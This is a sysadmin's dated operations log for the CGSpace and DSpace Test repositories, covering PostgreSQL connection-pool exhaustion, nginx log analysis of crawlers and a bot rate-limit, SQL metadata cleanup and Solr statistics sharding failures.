+2017-12-19 18:26:56,993 WARN  org.dspace.core.ConfigurationManager @ Warning: Number format error in property: db.maxidle
+
    +
  • If I add the db values back to dspace.cfg the dspace database info command succeeds but the log still shows errors retrieving the JNDI connection
  • +
  • Perhaps something to report to the dspace-tech mailing list when I finally send my comments
  • +
  • Oh cool! select * from pg_stat_activity shows “PostgreSQL JDBC Driver” for the application name! That’s how you know it’s working!
  • +
  • If you monitor the pg_stat_activity while you run dspace database info you can see that it doesn’t use the JNDI and creates ~9 extra PostgreSQL connections!
  • +
  • And in the middle of all of this Linode sends an alert that CGSpace has high CPU usage from 2 to 4 PM
  • +
+
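    +
  • Going back to pg_stat_activity, a quick way to see which pool the connections come from is to group by application name and state, something like:
  • +
+
$ sudo -u postgres psql dspacetest
+dspacetest=# SELECT application_name, state, count(*) FROM pg_stat_activity GROUP BY 1, 2 ORDER BY 3 DESC;
+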

2017-12-20

+
    +
  • The database connection pooling is definitely better!
  • +
+

PostgreSQL connection pooling on DSpace Test

+
    +
  • Now there is only one set of idle connections shared among all the web applications, instead of 10+ per application
  • +
  • There are short bursts of connections up to 10, but it generally stays around 5
  • +
  • Test and import 13 records to CGSpace for Abenet:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
+$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchiveFormat -m systemoffice.map &> systemoffice.log
+
    +
  • The fucking database went from 47 to 72 to 121 connections while I was importing, so the import stalled.
  • +
  • Since I had to restart Tomcat anyways, I decided to just deploy the new JNDI connection pooling stuff on CGSpace
  • +
  • There was an initial connection storm of 50 PostgreSQL connections, but then it settled down to 7
  • +
  • After that CGSpace came up fine and I was able to import the 13 items without issue:
  • +
+
$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchiveFormat -m systemoffice.map &> systemoffice.log
+$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
+
+

2017-12-24

+
    +
  • Linode alerted that CGSpace was using high CPU this morning around 6 AM
  • +
  • I’m playing with reading all of a month’s nginx logs into goaccess:
  • +
+
# find /var/log/nginx -type f -newermt "2017-12-01" | xargs zcat --force | goaccess --log-format=COMBINED -
+
    +
  • I can see interesting things using this approach, for example: +
      +
    • 50.116.102.77 checked our status almost 40,000 times so far this month—I think it’s the CGNet uptime tool
    • +
    • Also, we’ve handled 2.9 million requests this month from 172,000 unique IP addresses!
    • +
    • Total bandwidth so far this month is 640GiB (a quick way to re-check this from the logs is sketched after this list)
    • +
    • The user that made the most requests so far this month is 45.5.184.196 (267,000 requests)
    • +
    +
  • +
+
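  • A rough way to double-check the bandwidth figure from the same logs (a sketch; assumes the combined log format, with the response size in the tenth field):
# find /var/log/nginx -type f -newermt "2017-12-01" | xargs zcat --force | awk '{sum += $10} END {printf "%.1f GiB\n", sum / 1024 / 1024 / 1024}'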

2017-12-25

+
    +
  • The PostgreSQL connection pooling is much better when using the Tomcat JNDI pool
  • +
  • Here are the Munin stats for the past week on CGSpace:
  • +
+

CGSpace PostgreSQL connections week

+

2017-12-29

+
    +
  • Looking at some old notes for metadata to clean up, I found a few hundred corrections in cg.fulltextstatus and dc.language.iso:
  • +
+
# update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
+UPDATE 5
+# delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
+DELETE 17
+# update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
+UPDATE 49
+# update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
+UPDATE 4
+# update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
+UPDATE 16
+# update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
+UPDATE 9
+# update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
+UPDATE 1
+# update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
+UPDATE 5
+# delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
+DELETE 20
+
    +
  • I need to figure out why we have records with language “in” because that’s not a language! (a quick query to review the remaining values is below)
  • +
+
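  • A quick query to review the remaining distinct language values (a sketch; 38 is the dc.language.iso field ID used in the updates above, and the database is assumed to be named dspace):
$ psql -d dspace -c "SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=38 GROUP BY text_value ORDER BY count DESC;"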

2017-12-30

+
    +
  • Linode alerted that CGSpace was using 259% CPU from 4 to 6 AM
  • +
  • Uptime Robot noticed that the server went down for 1 minute a few hours later, around 9AM
  • +
  • Here are the XMLUI logs:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "30/Dec/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    637 207.46.13.106
+    641 157.55.39.186
+    715 68.180.229.254
+    924 104.196.152.243
+   1012 66.249.64.95
+   1060 216.244.66.245
+   1120 54.175.208.220
+   1287 66.249.64.93
+   1586 66.249.64.78
+   3653 66.249.64.91
+
    +
  • Looks pretty normal actually, but I don’t know who 54.175.208.220 is
  • +
  • They identify as “com.plumanalytics”, which Google says is associated with Elsevier
  • +
  • They only seem to have used one Tomcat session so that’s good, I guess I don’t need to add them to the Tomcat Crawler Session Manager valve:
  • +
+
$ grep 54.175.208.220 dspace.log.2017-12-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l          
+1 
+
    +
  • 216.244.66.245 seems to be moz.com’s DotBot
  • +
+

2017-12-31

+
    +
  • I finished working on the 42 records for CCAFS after Magdalena sent the remaining corrections
  • +
  • After that I uploaded them to CGSpace:
  • +
+
$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat -m ccafs.map &> ccafs.log
+

January, 2018

+ +
+

2018-01-02

+
    +
  • Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time
  • +
  • I didn’t get any load alerts from Linode and the REST and XMLUI logs don’t show anything out of the ordinary
  • +
  • The nginx logs show HTTP 200s until 02/Jan/2018:11:27:17 +0000 when Uptime Robot got an HTTP 500
  • +
  • In dspace.log around that time I see many errors like “Client closed the connection before file download was complete”
  • +
  • And just before that I see this:
  • +
+
Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
+
    +
  • Ah hah! So the pool was actually empty!
  • +
  • I need to increase that, let’s try to bump it up from 50 to 75
  • +
  • After that one client got an HTTP 499 but then the rest were HTTP 200, so I don’t know what the hell Uptime Robot saw
  • +
  • I notice this error quite a few times in dspace.log:
  • +
+
2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
+
    +
  • And there are many of these errors every day for the past month:
  • +
+
$ grep -c "Error while searching for sidebar facets" dspace.log.*
+dspace.log.2017-11-21:4
+dspace.log.2017-11-22:1
+dspace.log.2017-11-23:4
+dspace.log.2017-11-24:11
+dspace.log.2017-11-25:0
+dspace.log.2017-11-26:1
+dspace.log.2017-11-27:7
+dspace.log.2017-11-28:21
+dspace.log.2017-11-29:31
+dspace.log.2017-11-30:15
+dspace.log.2017-12-01:15
+dspace.log.2017-12-02:20
+dspace.log.2017-12-03:38
+dspace.log.2017-12-04:65
+dspace.log.2017-12-05:43
+dspace.log.2017-12-06:72
+dspace.log.2017-12-07:27
+dspace.log.2017-12-08:15
+dspace.log.2017-12-09:29
+dspace.log.2017-12-10:35
+dspace.log.2017-12-11:20
+dspace.log.2017-12-12:44
+dspace.log.2017-12-13:36
+dspace.log.2017-12-14:59
+dspace.log.2017-12-15:104
+dspace.log.2017-12-16:53
+dspace.log.2017-12-17:66
+dspace.log.2017-12-18:83
+dspace.log.2017-12-19:101
+dspace.log.2017-12-20:74
+dspace.log.2017-12-21:55
+dspace.log.2017-12-22:66
+dspace.log.2017-12-23:50
+dspace.log.2017-12-24:85
+dspace.log.2017-12-25:62
+dspace.log.2017-12-26:49
+dspace.log.2017-12-27:30
+dspace.log.2017-12-28:54
+dspace.log.2017-12-29:68
+dspace.log.2017-12-30:89
+dspace.log.2017-12-31:53
+dspace.log.2018-01-01:45
+dspace.log.2018-01-02:34
+
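  • Out of curiosity, one could replay that query directly against Solr to see whether the range parses when the spaces are sent properly encoded (a sketch; assumes the Discovery core is named search and Solr is listening on port 8081):
$ http 'http://localhost:8081/solr/search/select' q=='dateIssued_keyword:[1976 TO 1979]' rows==0 wt==json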
    +
  • Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let’s Encrypt if it’s just a handful of domains
  • +
+
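  • For example, a single Let’s Encrypt certificate covering a few explicit domains could be requested with certbot’s webroot plugin (a sketch; the webroot path here is just a placeholder):
# certbot certonly --webroot -w /var/www/html -d ilri.org -d www.ilri.org   # webroot path is a placeholder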

2018-01-03

+
    +
  • I woke up to more ups and downs of CGSpace; this time UptimeRobot noticed a few rounds of downtime lasting a few minutes each, and Linode also notified us of high CPU load from 12 to 2 PM
  • +
  • Looks like I need to increase the database pool size again:
  • +
+
$ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
+dspace.log.2018-01-01:0
+dspace.log.2018-01-02:1972
+dspace.log.2018-01-03:1909
+
    +
  • For some reason there were a lot of “active” connections last night:
  • +
+

CGSpace PostgreSQL connections

+
    +
  • The active IPs in XMLUI are:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "3/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    607 40.77.167.141
+    611 2a00:23c3:8c94:7800:392c:a491:e796:9c50
+    663 188.226.169.37
+    759 157.55.39.245
+    887 68.180.229.254
+   1037 157.55.39.175
+   1068 216.244.66.245
+   1495 66.249.64.91
+   1934 104.196.152.243
+   2219 134.155.96.78
+
    +
  • 134.155.96.78 appears to be at the University of Mannheim in Germany
  • +
  • They identify as: Mozilla/5.0 (compatible; heritrix/3.2.0 +http://ifm.uni-mannheim.de)
  • +
  • This appears to be the Internet Archive’s open source bot
  • +
  • They seem to be re-using their Tomcat session so I don’t need to do anything to them just yet:
  • +
+
$ grep 134.155.96.78 dspace.log.2018-01-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
+2
+
    +
  • The API logs show the normal users:
  • +
+
# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "3/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+     32 207.46.13.182
+     38 40.77.167.132
+     38 68.180.229.254
+     43 66.249.64.91
+     46 40.77.167.141
+     49 157.55.39.245
+     79 157.55.39.175
+   1533 50.116.102.77
+   4069 70.32.83.92
+   9355 45.5.184.196
+
    +
  • In other related news, I see a sizeable number of requests coming from python-requests
  • +
  • For example, just in the last day there were 1700!
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -c python-requests
+1773
+
    +
  • But they come from hundreds of IPs, many of which are 54.x.x.x:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep python-requests | awk '{print $1}' | sort -n | uniq -c | sort -h | tail -n 30
+      9 54.144.87.92
+      9 54.146.222.143
+      9 54.146.249.249
+      9 54.158.139.206
+      9 54.161.235.224
+      9 54.163.41.19
+      9 54.163.4.51
+      9 54.196.195.107
+      9 54.198.89.134
+      9 54.80.158.113
+     10 54.198.171.98
+     10 54.224.53.185
+     10 54.226.55.207
+     10 54.227.8.195
+     10 54.242.234.189
+     10 54.242.238.209
+     10 54.80.100.66
+     11 54.161.243.121
+     11 54.205.154.178
+     11 54.234.225.84
+     11 54.87.23.173
+     11 54.90.206.30
+     12 54.196.127.62
+     12 54.224.242.208
+     12 54.226.199.163
+     13 54.162.149.249
+     13 54.211.182.255
+     19 50.17.61.150
+     21 54.211.119.107
+    139 164.39.7.62
+
    +
  • I have no idea what these are but they seem to be coming from Amazon…
  • +
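  • One way to check who owns one of those ranges (a sketch using an IP from the list above):
# whois 54.144.87.92 | grep -E -i '(OrgName|NetName)'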
  • I guess for now I just have to increase the database connection pool’s max active
  • +
  • It’s currently 75 and normally I’d just bump it by 25 but let me be a bit daring and push it by 50 to 125, because I used to see at least 121 connections in pg_stat_activity before when we were using the shitty default pooling
  • +
+

2018-01-04

+
    +
  • CGSpace went down and up a bunch of times last night, and ILRI staff were complaining a lot
  • +
  • The XMLUI logs show this activity:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "4/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    968 197.211.63.81
+    981 213.55.99.121
+   1039 66.249.64.93
+   1258 157.55.39.175
+   1273 207.46.13.182
+   1311 157.55.39.191
+   1319 157.55.39.197
+   1775 66.249.64.78
+   2216 104.196.152.243
+   3366 66.249.64.91
+
    +
  • Again we ran out of PostgreSQL database connections, even after bumping the pool max active limit from 50 to 75 to 125 yesterday!
  • +
+
2018-01-04 07:36:08,089 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
+org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-256] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:125; busy:125; idle:0; lastwait:5000].
+
    +
  • So for this week that is the number one problem!
  • +
+
$ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
+dspace.log.2018-01-01:0
+dspace.log.2018-01-02:1972
+dspace.log.2018-01-03:1909
+dspace.log.2018-01-04:1559
+
    +
  • I will just bump the connection limit to 300 because I’m fucking fed up with this shit
  • +
  • Once I get back to Amman I will have to try to create different database pools for different web applications, like recently discussed on the dspace-tech mailing list
  • +
  • Create accounts on CGSpace for two CTA staff km4ard@cta.int and bheenick@cta.int
  • +
+

2018-01-05

+
    +
  • Peter said that CGSpace was down last night and Tsega restarted Tomcat
  • +
  • I don’t see any alerts from Linode or UptimeRobot, and there are no PostgreSQL connection errors in the dspace logs for today:
  • +
+
$ grep -c "Timeout: Pool empty." dspace.log.2018-01-*
+dspace.log.2018-01-01:0
+dspace.log.2018-01-02:1972
+dspace.log.2018-01-03:1909
+dspace.log.2018-01-04:1559
+dspace.log.2018-01-05:0
+
    +
  • Daniel asked for help with their DAGRIS server (linode2328112) that has no disk space
  • +
  • I had a look and there is one Apache 2 log file that is 73GB, with lots of this:
  • +
+
[Fri Jan 05 09:31:22.965398 2018] [:error] [pid 9340] [client 213.55.99.121:64476] WARNING: Unable to find a match for "9-16-1-RV.doc" in "/home/files/journals/6//articles/9/". Skipping this file., referer: http://dagris.info/reviewtool/index.php/index/install/upgrade
+
    +
  • I will delete the log file for now and tell Danny
  • +
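  • As an alternative to deleting it, truncating the file in place would free the space immediately without restarting Apache, since Apache keeps the file handle open (a sketch with a placeholder path):
# truncate -s 0 /var/log/apache2/dagris-error.log   # placeholder path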
  • Also, I’m still seeing a hundred or so of the “ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer” errors in the dspace logs; I need to search the dspace-tech mailing list to see what the cause is
  • +
  • I will run a full Discovery reindex in the meantime to see if it’s something wrong with the Discovery Solr core
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
+$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
+
+real    110m43.985s
+user    15m24.960s
+sys     3m14.890s
+
+

2018-01-06

+
    +
  • I’m still seeing Solr errors in the DSpace logs even after the full reindex yesterday:
  • +
+
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1983+TO+1989]': Encountered " "]" "] "" at line 1, column 32.
+
    +
  • I posted a message to the dspace-tech mailing list to see if anyone can help
  • +
+

2018-01-09

+
    +
  • Advise Sisay about blank lines in some IITA records
  • +
  • Generate a list of author affiliations for Peter to clean up:
  • +
+
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
+COPY 4515
+

2018-01-10

+
    +
  • I looked to see what happened to this year’s Solr statistics sharding task that should have run on 2018-01-01 and of course it failed:
  • +
+
Moving: 81742 into core statistics-2010
+Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2010
+org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2010
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:566)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.dspace.statistics.SolrLogger.shardSolrIndex(SourceFile:2243)
+        at org.dspace.statistics.util.StatisticsClient.main(StatisticsClient.java:106)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+Caused by: org.apache.http.client.ClientProtocolException
+        at org.apache.http.impl.client.AbstractHttpClient.doExecute(AbstractHttpClient.java:867)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:82)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:106)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:57)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:448)
+        ... 10 more
+Caused by: org.apache.http.client.NonRepeatableRequestException: Cannot retry request with a non-repeatable request entity.  The cause lists the reason the original request failed.
+        at org.apache.http.impl.client.DefaultRequestDirector.tryExecute(DefaultRequestDirector.java:659)
+        at org.apache.http.impl.client.DefaultRequestDirector.execute(DefaultRequestDirector.java:487)
+        at org.apache.http.impl.client.AbstractHttpClient.doExecute(AbstractHttpClient.java:863)
+        ... 14 more
+Caused by: java.net.SocketException: Connection reset
+        at java.net.SocketOutputStream.socketWrite(SocketOutputStream.java:115)
+        at java.net.SocketOutputStream.write(SocketOutputStream.java:155)
+        at org.apache.http.impl.io.AbstractSessionOutputBuffer.flushBuffer(AbstractSessionOutputBuffer.java:159)
+        at org.apache.http.impl.io.AbstractSessionOutputBuffer.write(AbstractSessionOutputBuffer.java:179)
+        at org.apache.http.impl.io.ChunkedOutputStream.flushCacheWithAppend(ChunkedOutputStream.java:124)
+        at org.apache.http.impl.io.ChunkedOutputStream.write(ChunkedOutputStream.java:181)
+        at org.apache.http.entity.InputStreamEntity.writeTo(InputStreamEntity.java:132)
+        at org.apache.http.entity.HttpEntityWrapper.writeTo(HttpEntityWrapper.java:89)
+        at org.apache.http.impl.client.EntityEnclosingRequestWrapper$EntityWrapper.writeTo(EntityEnclosingRequestWrapper.java:108)
+        at org.apache.http.impl.entity.EntitySerializer.serialize(EntitySerializer.java:117)
+        at org.apache.http.impl.AbstractHttpClientConnection.sendRequestEntity(AbstractHttpClientConnection.java:265)
+        at org.apache.http.impl.conn.ManagedClientConnectionImpl.sendRequestEntity(ManagedClientConnectionImpl.java:203)
+        at org.apache.http.protocol.HttpRequestExecutor.doSendRequest(HttpRequestExecutor.java:236)
+        at org.apache.http.protocol.HttpRequestExecutor.execute(HttpRequestExecutor.java:121)
+        at org.apache.http.impl.client.DefaultRequestDirector.tryExecute(DefaultRequestDirector.java:685)
+        ... 16 more
+
    +
  • DSpace Test has the same error, but when creating the 2017 core:
  • +
+
Moving: 2243021 into core statistics-2017
+Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2017
+org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2017
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:566)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.dspace.statistics.SolrLogger.shardSolrIndex(SourceFile:2243)
+        at org.dspace.statistics.util.StatisticsClient.main(StatisticsClient.java:106)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+Caused by: org.apache.http.client.ClientProtocolException
+        at org.apache.http.impl.client.AbstractHttpClient.doExecute(AbstractHttpClient.java:867)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:82)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:106)
+        at org.apache.http.impl.client.CloseableHttpClient.execute(CloseableHttpClient.java:57)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:448)
+        ... 10 more
+
+
$ http 'http://localhost:3000/solr/statistics/select?q=owningColl%3A*&wt=json&indent=true' | grep numFound 
+  "response":{"numFound":48476327,"start":0,"docs":[
+$ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&wt=json&indent=true' | grep numFound
+  "response":{"numFound":34879872,"start":0,"docs":[
+
    +
  • I tested the dspace stats-util -s process on my local machine and it failed the same way
  • +
  • It doesn’t seem to be helpful, but the dspace log shows this:
  • +
+
2018-01-10 10:51:19,301 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2016
+2018-01-10 10:51:19,301 INFO  org.dspace.statistics.SolrLogger @ Moving: 3821 records into core statistics-2016
+
+
$ grep -c "Timeout: Pool empty." dspace.log.2018-01-10 
+0
+
    +
  • The XMLUI logs show quite a bit of activity today:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "10/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+    951 207.46.13.159
+    954 157.55.39.123
+   1217 95.108.181.88
+   1503 104.196.152.243
+   6455 70.36.107.50
+  11412 70.36.107.190
+  16730 70.36.107.49
+  17386 2607:fa98:40:9:26b6:fdff:feff:1c96
+  21566 2607:fa98:40:9:26b6:fdff:feff:195d
+  45384 2607:fa98:40:9:26b6:fdff:feff:1888
+
    +
  • The user agents for the top six or so IPs are all the same:
  • +
+
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36"
+
    +
  • whois says they come from Perfect IP
  • +
  • I’ve never seen those top IPs before, but they have created 50,000 Tomcat sessions today:
  • +
+
$ grep -E '(2607:fa98:40:9:26b6:fdff:feff:1888|2607:fa98:40:9:26b6:fdff:feff:195d|2607:fa98:40:9:26b6:fdff:feff:1c96|70.36.107.49|70.36.107.190|70.36.107.50)' /home/cgspace.cgiar.org/log/dspace.log.2018-01-10 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l                                                                                                                                                                                                  
+49096
+
    +
  • Rather than blocking their IPs, I think I might just add their user agent to the “badbots” zone with Baidu, because they seem to be the only ones using that user agent:
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari
+/537.36" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
+   6796 70.36.107.50
+  11870 70.36.107.190
+  17323 70.36.107.49
+  19204 2607:fa98:40:9:26b6:fdff:feff:1c96
+  23401 2607:fa98:40:9:26b6:fdff:feff:195d 
+  47875 2607:fa98:40:9:26b6:fdff:feff:1888
+
    +
  • I added the user agent to nginx’s badbots limit_req zone, but upon testing the config I got an error:
  • +
+
# nginx -t
+nginx: [emerg] could not build map_hash, you should increase map_hash_bucket_size: 64
+nginx: configuration file /etc/nginx/nginx.conf test failed
+
+
# cat /proc/cpuinfo | grep cache_alignment | head -n1
+cache_alignment : 64
+
    +
  • On our servers the cache alignment is 64, so I increased the map_hash_bucket_size to 128 and deployed the changes to nginx
  • +
  • Almost immediately the PostgreSQL connections dropped back down to 40 or so, and UptimeRobot said the site was back up
  • +
  • So it’s interesting that we’re not out of PostgreSQL connections (the current pool maxActive is 300!), but the system is “down” to UptimeRobot and very slow to use
  • +
  • Linode continues to test mitigations for Meltdown and Spectre: https://blog.linode.com/2018/01/03/cpu-vulnerabilities-meltdown-spectre/
  • +
  • I rebooted DSpace Test to see if the kernel will be updated (currently Linux 4.14.12-x86_64-linode92)… nope.
  • +
  • It looks like Linode will reboot the KVM hosts later this week, though
  • +
  • Udana from WLE asked if we could give him permission to upload CSVs to CGSpace (which would require super admin access)
  • +
  • Citing concerns with metadata quality, I suggested adding him on DSpace Test first
  • +
  • I opened a ticket with Atmire to ask them about DSpace 5.8 compatibility: https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560
  • +
+

2018-01-11

+
    +
  • The PostgreSQL and firewall graphs from this week clearly show the load from the new PerfectIP.net bot yesterday:
  • +
+

PostgreSQL load / Firewall load

+
    +
  • Linode rebooted DSpace Test and CGSpace for their host hypervisor kernel updates
  • +
  • Following up on the Solr sharding issue on the dspace-tech mailing list, I noticed this interesting snippet in the Tomcat localhost_access_log at the time of my sharding attempt on my test machine:
  • +
+
127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?q=type%3A2+AND+id%3A1&wt=javabin&version=2 HTTP/1.1" 200 107
+127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?q=*%3A*&rows=0&facet=true&facet.range=time&facet.range.start=NOW%2FYEAR-18YEARS&facet.range.end=NOW%2FYEAR%2B0YEARS&facet.range.gap=%2B1YEAR&facet.mincount=1&wt=javabin&version=2 HTTP/1.1" 200 447
+127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/admin/cores?action=STATUS&core=statistics-2016&indexInfo=true&wt=javabin&version=2 HTTP/1.1" 200 76
+127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/admin/cores?action=CREATE&name=statistics-2016&instanceDir=statistics&dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&wt=javabin&version=2 HTTP/1.1" 200 63
+127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/select?csv.mv.separator=%7C&q=*%3A*&fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&rows=10000&wt=csv HTTP/1.1" 200 2137630
+127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "GET /solr/statistics/admin/luke?show=schema&wt=javabin&version=2 HTTP/1.1" 200 16253
+127.0.0.1 - - [10/Jan/2018:10:51:19 +0200] "POST /solr//statistics-2016/update/csv?commit=true&softCommit=false&waitSearcher=true&f.previousWorkflowStep.split=true&f.previousWorkflowStep.separator=%7C&f.previousWorkflowStep.encapsulator=%22&f.actingGroupId.split=true&f.actingGroupId.separator=%7C&f.actingGroupId.encapsulator=%22&f.containerCommunity.split=true&f.containerCommunity.separator=%7C&f.containerCommunity.encapsulator=%22&f.range.split=true&f.range.separator=%7C&f.range.encapsulator=%22&f.containerItem.split=true&f.containerItem.separator=%7C&f.containerItem.encapsulator=%22&f.p_communities_map.split=true&f.p_communities_map.separator=%7C&f.p_communities_map.encapsulator=%22&f.ngram_query_search.split=true&f.ngram_query_search.separator=%7C&f.ngram_query_search.encapsulator=%22&f.containerBitstream.split=true&f.containerBitstream.separator=%7C&f.containerBitstream.encapsulator=%22&f.owningItem.split=true&f.owningItem.separator=%7C&f.owningItem.encapsulator=%22&f.actingGroupParentId.split=true&f.actingGroupParentId.separator=%7C&f.actingGroupParentId.encapsulator=%22&f.text.split=true&f.text.separator=%7C&f.text.encapsulator=%2